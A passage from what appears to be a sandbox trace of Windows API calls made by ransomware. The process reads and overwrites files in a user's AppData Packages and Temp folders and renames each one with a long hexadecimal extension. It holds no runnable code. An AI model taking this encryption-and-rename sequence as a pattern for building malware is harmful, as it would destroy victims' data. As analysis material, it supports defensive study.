(in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.345] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.346] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.426] WriteFile (in: hFile=0x338, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.430] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.563] ReadFile (in: hFile=0x324, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0119.563] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.625] ReadFile (in: hFile=0x320, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0119.626] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.628] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x26fff70) returned 0x0 [0119.629] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".B22042194FAB7E800F187E0E0B5DC789DFD38F86838F63FA5BB507C792AF5D50" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.B22042194FAB7E800F187E0E0B5DC789DFD38F86838F63FA5BB507C792AF5D50") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.B22042194FAB7E800F187E0E0B5DC789DFD38F86838F63FA5BB507C792AF5D50" [0119.629] GetProcessHeap () returned 0x600000 [0119.629] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x190) returned 0x6b17b0 [0119.629] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x6b17b0, Length=0x190, FileInformationClass=0xa) returned 0x0 [0119.630] CloseHandle (hObject=0x320) returned 1 [0119.631] GetProcessHeap () returned 0x600000 [0119.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0119.634] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.705] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0119.706] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.708] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0119.709] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".40F67F3F6EA8212379EE2F91A10B70C170C748BAFA2A2E7BF55A106122014A73" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.40F67F3F6EA8212379EE2F91A10B70C170C748BAFA2A2E7BF55A106122014A73") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.40F67F3F6EA8212379EE2F91A10B70C170C748BAFA2A2E7BF55A106122014A73" [0119.709] GetProcessHeap () returned 0x600000 [0119.709] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x262) returned 0x6da080 [0119.709] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x26fff60, FileInformation=0x6da080, Length=0x262, FileInformationClass=0xa) returned 0x0 [0119.746] CloseHandle (hObject=0x324) returned 1 [0119.747] GetProcessHeap () returned 0x600000 [0119.747] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.750] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.753] WriteFile (in: hFile=0x320, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0119.754] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0119.974] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0119.974] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".6ADB1110BBBA93A5CAE0D96D35733E113DCFD4A6B3A46E7AF5DF7CD7C96AF27B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.6ADB1110BBBA93A5CAE0D96D35733E113DCFD4A6B3A46E7AF5DF7CD7C96AF27B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\Microsoft.WindowsAlarms_10.1510.12020.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.6ADB1110BBBA93A5CAE0D96D35733E113DCFD4A6B3A46E7AF5DF7CD7C96AF27B" [0119.974] GetProcessHeap () returned 0x600000 [0119.974] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x220) returned 0x6db6f8 [0119.974] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x6db6f8, Length=0x220, FileInformationClass=0xa) returned 0x0 [0119.976] CloseHandle (hObject=0x31c) returned 1 [0119.976] GetProcessHeap () returned 0x600000 [0119.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.977] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.030] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.031] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.067] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.067] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.158] ReadFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0120.159] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.159] WriteFile (in: hFile=0x320, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0120.160] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.160] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0120.161] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".3E6E42B901C956114377B2CC86120FB8411AFAE6B6F45C68C5D20C85A13A1004" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.3E6E42B901C956114377B2CC86120FB8411AFAE6B6F45C68C5D20C85A13A1004") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\Settings\\settings.dat.3E6E42B901C956114377B2CC86120FB8411AFAE6B6F45C68C5D20C85A13A1004" [0120.161] GetProcessHeap () returned 0x600000 [0120.161] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18e) returned 0x6b2e00 [0120.161] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x6b2e00, Length=0x18e, FileInformationClass=0xa) returned 0x0 [0120.164] CloseHandle (hObject=0x320) returned 1 [0120.165] GetProcessHeap () returned 0x600000 [0120.165] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0120.167] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.279] ReadFile (in: hFile=0x324, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.290] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.302] WriteFile (in: hFile=0x320, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0120.303] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.417] WriteFile (in: hFile=0x324, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0120.418] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.475] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0120.476] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.483] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0120.483] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".8455F5F4ECAA9F8B59F949443BA0DE59715A1C5947901C0EA005AEDC5FB15F65" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.8455F5F4ECAA9F8B59F949443BA0DE59715A1C5947901C0EA005AEDC5FB15F65") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Microsoft.WindowsMaps_4.1509.50911.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.8455F5F4ECAA9F8B59F949443BA0DE59715A1C5947901C0EA005AEDC5FB15F65" [0120.483] GetProcessHeap () returned 0x600000 [0120.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x216) returned 0x63e4f0 [0120.484] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x26fff60, FileInformation=0x63e4f0, Length=0x216, FileInformationClass=0xa) returned 0x0 [0120.485] CloseHandle (hObject=0x320) returned 1 [0120.485] GetProcessHeap () returned 0x600000 [0120.485] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0120.487] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0120.503] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0120.504] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.201] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0121.202] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".61AF6E60BDD131FF3B06D33D960BFD473248EC0B3044DE046CBAE366B4FC9D5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.61AF6E60BDD131FF3B06D33D960BFD473248EC0B3044DE046CBAE366B4FC9D5E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\Settings\\settings.dat.61AF6E60BDD131FF3B06D33D960BFD473248EC0B3044DE046CBAE366B4FC9D5E" [0121.202] GetProcessHeap () returned 0x600000 [0121.202] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x6b2938 [0121.202] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x6b2938, Length=0x186, FileInformationClass=0xa) returned 0x0 [0121.206] CloseHandle (hObject=0x31c) returned 1 [0121.206] GetProcessHeap () returned 0x600000 [0121.206] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0121.207] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.269] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.273] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.281] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x26fff70) returned 0x0 [0121.281] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".098355D8E4F6755A7FFC38F530A8B1697C2D27B1E37538DB4B8BB18B02E12A6D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.098355D8E4F6755A7FFC38F530A8B1697C2D27B1E37538DB4B8BB18B02E12A6D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Settings\\settings.dat.098355D8E4F6755A7FFC38F530A8B1697C2D27B1E37538DB4B8BB18B02E12A6D" [0121.281] GetProcessHeap () returned 0x600000 [0121.281] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x314f9d8 [0121.281] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x26fff60, FileInformation=0x314f9d8, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0121.282] CloseHandle (hObject=0x31c) returned 1 [0121.283] GetProcessHeap () returned 0x600000 [0121.283] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.284] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.286] WriteFile (in: hFile=0x338, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0121.287] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.324] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.326] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.791] WriteFile (in: hFile=0x338, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.792] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.830] WriteFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0121.833] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.875] WriteFile (in: hFile=0x338, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.875] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.915] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.916] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.991] ReadFile (in: hFile=0x338, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x7e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0121.992] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0121.996] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0121.997] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3", lpString2=".6849EE099374947775D67B29CAA6E2F4AF0C097D5DD092D557987DAC03250A6C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9YpZDvMy.mp3.6849EE099374947775D67B29CAA6E2F4AF0C097D5DD092D557987DAC03250A6C") 